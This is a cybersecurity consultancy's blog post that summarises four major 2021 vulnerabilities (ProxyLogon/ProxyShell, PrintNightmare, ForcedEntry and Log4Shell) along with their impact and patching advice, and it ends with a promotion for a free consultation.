Luiz is Director of Security Testing at Chess Group. He brings 15 years of experience of leading complex security testing engagements and manages Armadillo's team of 15 cyber security consultants. He has previously been seconded to internal test teams in retail banks, and also worked as part of the Security Operations Centre at the London 2012 games. Luiz's research interest areas include phishing, social engineering and ransomware. Luiz holds an MSc in Information Security from Royal Holloway, and is NCSC CHECK Team Leader, CREST Certified Infrastructure Tester and Certified Simulated Attack Specialist.
Luiz Simpson, Director of Security Testing, summarised the top four vulnerabilities from last year. Learn all you need to know about:
- Jump to ProxyLogon and ProxyShell >
- Jump to PrintNightmare >
- Jump to ForcedEntry >
- Jump to Log4Shell >
- Jump to Book Your Free Consultation >
2021 was the busiest year on record for reported vulnerabilities with a number of accompanying high profile exploits. In line with previous years, the complexity of vulnerabilities continues to increase, while the time between patch release and exploitation is ever decreasing. Here we identify some of the top vulnerabilities which kept security and IT teams busy during 2021.
ProxyLogon and ProxyShell
In March 2021, both Microsoft and IT Professionals had a major headache in the form of an Exchange zero-day commonly known as ProxyLogon. The vulnerability, widely considered the most critical to ever hit Microsoft Exchange, was quickly exploited in the wild by suspected state-sponsored threat actors, with US government and military systems identified as the most targeted sectors. Ransomware variants such as DoejoCrypt were soon actively exploiting unpatched Exchange instances, attempting to monetise the vulnerability.
A follow-up exploit, dubbed ProxyShell, was evolutionary in nature and targeted on-premise Client Access Servers (CAS) in all supported versions of Exchange Server. Due to the remotely accessible nature of Exchange CAS, any unpatched instances would be vulnerable to Remote Code Execution. High profile victims included the European Banking Authority and the Norwegian Parliament.
Whilst Microsoft 365-based Exchange was not vulnerable, organisations running hybrid Exchange environments could potentially be exploited by threat actors leveraging lateral movement vectors.
Microsoft quickly released patches and scanning tools to help identify and mitigate the risks. However, many smaller organisations without dedicated security teams struggled to realise and contain the threat. As a result, the National Cyber Security Centre (NCSC) proactively reached out to organisations and provided remediation advice.
To minimise the risk of compromise, reducing Mean Time to Patch (MTTP) continues to be key, especially for critical vulnerabilities such as ProxyLogon and ProxyShell. Subscribing for services such as the NCSC Early Warning can help organisations ensure early visibility of newly released advisories, while Endpoint Detection and Response solutions would help you identify suspicious activity within your infrastructure.
In June, Microsoft released a critical security update to address weaknesses in the Printer Spooler service on Windows desktop and server platforms. Unfortunately, it was released out-of-band outside of the standard patch Tuesdays due to the severity. Microsoft even released patches for Windows 7, an supported operating system that does not normally receive updates.
Initially categorised by Microsoft as a local privilege escalation on Windows, security researchers subsequently identified an additional Remote Code Execution (RCE) vector resulting in an updated advisory from Microsoft. As ever, the ability to test and deploy patches in a time-sensitive manner is key to minimising the impact of such vulnerabilities.
Additionally, PrintNightmare had the additional horror factor of dropping during the summer holiday season in the northern hemisphere. Our consultants continue to see systems vulnerable to PrintNightmare on client engagements, which can be trivially leveraged to obtain privilege escalation on unpatched Windows systems.
Apple didn’t escape the wrath of critical zero-day vulnerabilities in 2021, with ForcedEntry made public in September. The concern was not just that it could escape in-built sandbox controls and be leveraged against almost all iOS versions at the time, but also that it was in the form of a one-click exploit meaning that no user interaction was needed. A threat actor would simply require the target victim’s phone number or email address to send a weaponised GIF. Furthermore, iMessage was affected on macOS and watchOS, giving the exploit a significant attack surface of well over a billion devices.
An analysis released at the end of 2021 confirmed a highly complex exploit which is believed to have been created by the NSO Group, creators of the Pegasus platform, albeit with the sophistication of nation-state actors. Given the nature of the attack and the level of complexity, high profile individuals are likely to be the intended targets of such exploits, only used sparingly against targeted victims.
It would not be possible to discuss 2021 in the context of vulnerabilities without the mention of Log4Shell. A widely used Java-based logging library caused headaches for Security professionals worldwide. Many scrambled to quantify their use of Log4j within their estates.
A zero-day exploit quickly followed, confirming the worst - Remote Code Execution (RCE) was indeed possible. However, what made the nature of the vulnerability even more challenging was the ability to exploit a backend logging system from an unaffected front end host. For example, an attacker can craft a weaponised log entry on a mobile app or webserver not running Log4j. The attacker could make their way through to backend middleware itself running Log4j, which significantly extends the attack surface of the vulnerability.
The NCSC even took the step of recommending the update was immediately applied, whether or not Log4Shell was known to be in use. As is commonly the case with critical vulnerabilities, two successive Log4j patches were subsequently released in the week following the original addressing Denial of Service (DoS) and a further RCE. This further increased workloads of Security and IT teams just as they thought the worst of 2021 had been and gone.
Naturally, it was only a matter of time before ransomware gangs leveraged Log4Shell for profit. At the start of 2022, we have seen even more variants seeking outdated Log4j instances. Detection of the vulnerability using a remote scanning tool is not trivial due to the nature of the service. Authenticated scans which search for affected libraries are preferable as these will validate package versions.
To learn more about how you can protect your organisation, book your free 30-minute security consultation with one of our penetration testers. Get agnostic advice from industry experts on how secure your business. Request here >
Vulnerability Assessment v Penetration Test
Gavin Wood, CTO at Chess, explains the difference between Vulnerability Assessment and Penetration Testing and their applications.
Your CREST Accredited Penetration Test Report
Gavin Wood, CTO at Chess, uncovers what is Penetration Testing and what a Penetration Test report should provide.